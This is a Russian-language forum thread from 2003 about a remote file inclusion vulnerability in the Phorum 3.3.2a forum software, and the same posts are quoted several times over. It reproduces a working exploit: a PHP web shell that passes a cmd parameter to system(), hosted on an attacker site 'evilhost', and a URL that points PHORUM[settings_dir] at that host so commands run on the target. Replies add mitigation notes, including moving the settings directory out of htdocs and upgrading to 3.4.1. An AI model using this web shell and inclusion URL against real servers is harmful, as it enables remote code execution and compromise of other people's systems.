> Phorum - приложение программного обеспечения форума, > написанное в php. > Недостаток защиты в программе позволяет удаленным > пользователям включать > внешние php сценарии и выполнять произвольный код и > команды. Пример: Создаем > файл replace.php на сайте evilhost: > <? > echo("<? > system(\"\$cmd\"); > ?>"); > ?> Если PHP не поддерживается, то вносим: > <? > system("$cmd"); > ?> > Затем: > > http://[target]/phorum/plugin/replace/plugin.php?PHORUM[set > tings_dir]=http://[evilhost]&cmd=ls > ----------------------------------------------------------- > ----- > все понятно, но что имеется в виду под settings_dir, я что > то не вкуриваю... > может кто подскажет?
/phorum/admin/settings
и кстати в файле install.txt сказано, что ее надо вынести за пределы дерева каталогов сервера (т.е. из htdocs). Уж не знаю, поможет ли:-
Phorum - приложение программного обеспечения форума, написанное в php.
Недостаток защиты в программе позволяет удаленным пользователям включать
внешние php сценарии и выполнять произвольный код и команды. Пример: Создаем
файл replace.php на сайте evilhost:
<?
echo("<?
system(\"\$cmd\");
?>");
?> Если PHP не поддерживается, то вносим:
<?
system("$cmd");
?>
Затем:
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls
----------------------------------------------------------------
все понятно, но что имеется в виду под settings_dir, я что то не вкуриваю...
может кто подскажет?
Уязвимость Phorum version 3.3.2a07.02.03 10:24 Автор: catlion <catlion> Статус: Member
> Phorum - приложение программного обеспечения форума, > написанное в php. > Недостаток защиты в программе позволяет удаленным > пользователям включать > внешние php сценарии и выполнять произвольный код и > команды. Пример: Создаем > файл replace.php на сайте evilhost: > <? > echo("<? > system(\"\$cmd\"); > ?>"); > ?> Если PHP не поддерживается, то вносим: > <? > system("$cmd"); > ?> > Затем: > > http://[target]/phorum/plugin/replace/plugin.php?PHORUM[set > tings_dir]=http://[evilhost]&cmd=ls > ----------------------------------------------------------- > ----- > все понятно, но что имеется в виду под settings_dir, я что > то не вкуриваю... > может кто подскажет?
/phorum/admin/settings
и кстати в файле install.txt сказано, что ее надо вынести за пределы дерева каталогов сервера (т.е. из htdocs). Уж не знаю, поможет ли:-
И еще, вышел стабильный phorum 3.4.1
Ребята, этой дыре уже миллионы лет :)12.02.03 03:00 Автор: Rara Avis Статус: Незарегистрированный пользователь
> > Phorum - приложение программного обеспечения форума, > > написанное в php. > > Недостаток защиты в программе позволяет удаленным > > пользователям включать > > внешние php сценарии и выполнять произвольный код и > > команды. Пример: Создаем > > файл replace.php на сайте evilhost: > > <? > > echo("<? > > system(\"\$cmd\"); > > ?>"); > > ?> Если PHP не поддерживается, то вносим: > > <? > > system("$cmd"); > > ?> > > Затем: > > > > > http://[target]/phorum/plugin/replace/plugin.php?PHORUM[set > > tings_dir]=http://[evilhost]&cmd=ls > > > ----------------------------------------------------------- > > ----- > > все понятно, но что имеется в виду под settings_dir, я > что > > то не вкуриваю... > > может кто подскажет? > > /phorum/admin/settings > и кстати в файле install.txt сказано, что ее надо вынести > за пределы дерева каталогов сервера (т.е. из htdocs). Уж не > знаю, поможет ли:- > > И еще, вышел стабильный phorum 3.4.1